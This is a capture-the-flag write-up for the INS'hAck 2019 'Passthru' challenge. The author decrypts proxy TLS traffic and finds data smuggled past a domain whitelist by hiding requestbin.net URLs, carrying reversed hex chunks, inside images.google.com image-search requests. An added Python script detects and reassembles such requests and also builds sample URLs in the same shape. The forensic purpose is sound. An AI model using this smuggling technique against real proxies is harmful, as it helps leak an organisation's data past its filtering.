Tuesday, May 7, 2019

INS'hAck 2019 - Passthru

by Renato "shrimpgo" Pacheco

Description

You’re part of a company security team and the admin has recently enabled interception on the company filtering proxy. The admin is pretty confident when it comes to its domain whitelist. He gave you a capture to review. Time to prove him wrong.


This challenge came with a pcap file called capture.pcap and a file called sslkey.log. Let’s see what is inside capture.pcap:

$ tcpick -r capture.pcap
Starting tcpick 0.2.1 at 2019-05-04 22:34 -03
Timeout for connections is 600
tcpick: reading from capture.pcap
1      SYN-SENT       127.0.0.1:59408 > 127.0.0.1:8080
1      SYN-RECEIVED   127.0.0.1:59408 > 127.0.0.1:8080
1      ESTABLISHED    127.0.0.1:59408 > 127.0.0.1:8080
1      FIN-WAIT-1     127.0.0.1:59408 > 127.0.0.1:8080
1      FIN-WAIT-2     127.0.0.1:59408 > 127.0.0.1:8080
1      RESET          127.0.0.1:59408 > 127.0.0.1:8080
2      SYN-SENT       127.0.0.1:59410 > 127.0.0.1:8080
2      SYN-RECEIVED   127.0.0.1:59410 > 127.0.0.1:8080
2      ESTABLISHED    127.0.0.1:59410 > 127.0.0.1:8080
2      FIN-WAIT-1     127.0.0.1:59410 > 127.0.0.1:8080
2      FIN-WAIT-2     127.0.0.1:59410 > 127.0.0.1:8080
2      RESET          127.0.0.1:59410 > 127.0.0.1:8080
...

There are a lot of connections on localhost to destination port 8080. Inspecting some packets, I could see a client browsing the Internet through a proxy, with all of the traffic encrypted. So how can I decrypt these packets? Wireshark is the solution! Opening capture.pcap in Wireshark, it looks like this:

Load sslkey.log in SSL Protocol (Edit > Preferences... > Protocols > SSL):

Now I can see HTTP Requests in plaintext:

The main accesses were wikipedia.org, forensicswiki.org, docs.python.com, en.cppreference.com and www.bcc.com, nothing relevant, BUT I found something odd among the other accesses: some requests to images.google.com with requestbin.net, redirecting to www.google.com/search?tbs:sbi... I didn’t know what requestbin.net was, so I read about it:

RequestBin gives you a URL that will collect requests made to it and let you inspect them in a human-friendly way. Use RequestBin to see what your HTTP client is sending or to inspect and debug webhook requests.

Here is an example:

https://images.google.com/searchbyimage?image_url=http%3A%2F%2Frequestbin.net%2Fr%2Fzk2s2ezk%3Fid%3D82290383-7480-487c-b78b-77ac769c56cd%26kcahsni%3D9ef773fe97f56554a3b4&encoded_image=&image_content=&filename=&hl=fr

Hum… Maybe if I access his requestbin ID zk2s2ezk I’ll find something.

Shit! It expired! What now? Still looking at the URL, I saw another clue. After id=... there was a parameter called kcahsni which, if you look closer, is inshack backwards! Cool! I took its content, 9ef773fe97f56554a3b4, and translated it to ASCII:

$ echo -n 9ef773fe97f56554a3b4 | xxd -r -p
��s���eT��

Nothing suspicious, but I’ll inspect the other URLs. I made a filter in Wireshark and extracted these packets (File > Extract Packets Dissections > Plaintext):

I wrote them to a file called exported.txt. Here are the steps I took to get to the hex values:

$ grep searchbyimage exported.txt | egrep -v "(Full request|Expert Info|GET)" | cut -d' ' -f11 > requests.txt
$ awk -F'%3D' '{print $3}' requests.txt | cut -d'&' -f1 | tr -d '\n' | xxd -r -p 
��s���eT��&��������rZ�9h�R�<
}e59ad3f38a01dca00f9759e6d205317642c5421fcdad034ebe7077c2bddd472b{ASNI
                                                                      2���l$���fg����(Ej�J�ơ.>�K

Hey! Look what I found! My suspicions were correct! Now just reverse the characters to get our flag:

$ echo "}e59ad3f38a01dca00f9759e6d205317642c5421fcdad034ebe7077c2bddd472b{ASNI" | rev
INSA{b274dddb2c7707ebe430dadcf1245c246713502d6e9579f00acd10a83f3da95e}

Flag: INSA{b274dddb2c7707ebe430dadcf1245c246713502d6e9579f00acd10a83f3da95e}
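
The same review done with URL parsing instead of field positions, as an added example that is not part of the original write-up: it flags requests to a whitelisted host whose query string carries a URL pointing at a non-whitelisted host, then joins the kcahsni chunks in capture order and reverses the result. The whitelist contents, the EXAMPLE bin ID and the sample secret are constructed assumptions; only the URL shape and the parameter name come from the capture described above.

```python
from urllib.parse import urlsplit, parse_qs, quote

ALLOWED = {"images.google.com"}  # assumed proxy whitelist, for illustration only

def nested_urls(url):
    """Return (param, value) pairs for query values that are themselves URLs."""
    found = []
    for name, values in parse_qs(urlsplit(url).query).items():
        for value in values:
            if urlsplit(value).scheme in ("http", "https"):
                found.append((name, value))
    return found

def flag_requests(urls, allowed=ALLOWED):
    """Inner URLs sent to an allowed host but pointing outside the whitelist."""
    hits = []
    for url in urls:
        if urlsplit(url).hostname not in allowed:
            continue
        for _, inner in nested_urls(url):
            if urlsplit(inner).hostname not in allowed:
                hits.append(inner)
    return hits

def reassemble(inner_urls, param="kcahsni"):
    """Join the hex chunks carried in `param` (capture order) and decode them."""
    chunks = (parse_qs(urlsplit(u).query).get(param, [""])[0] for u in inner_urls)
    return bytes.fromhex("".join(chunks))

def recover(urls):
    """Flag, reassemble, then undo the character reversal seen in the write-up."""
    return reassemble(flag_requests(urls)).decode("ascii", "replace")[::-1]

def make_sample(secret, size=10):
    """Constructed traffic in the write-up's URL shape (not data from the capture)."""
    data = secret[::-1].encode()
    urls = ["https://en.wikipedia.org/wiki/Proxy_server"]  # benign, ignored
    for i in range(0, len(data), size):
        inner = f"http://requestbin.net/r/EXAMPLE?id=0&kcahsni={data[i:i + size].hex()}"
        urls.append("https://images.google.com/searchbyimage?image_url="
                    + quote(inner, safe="") + "&hl=fr")
    return urls

if __name__ == "__main__":
    print(recover(make_sample("INSA{constructed-example-flag}")))
```

On the real capture the decoded bytes also contain non-printable padding around the flag, so the reversed string would need a search for the INSA{...} pattern rather than being read whole.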
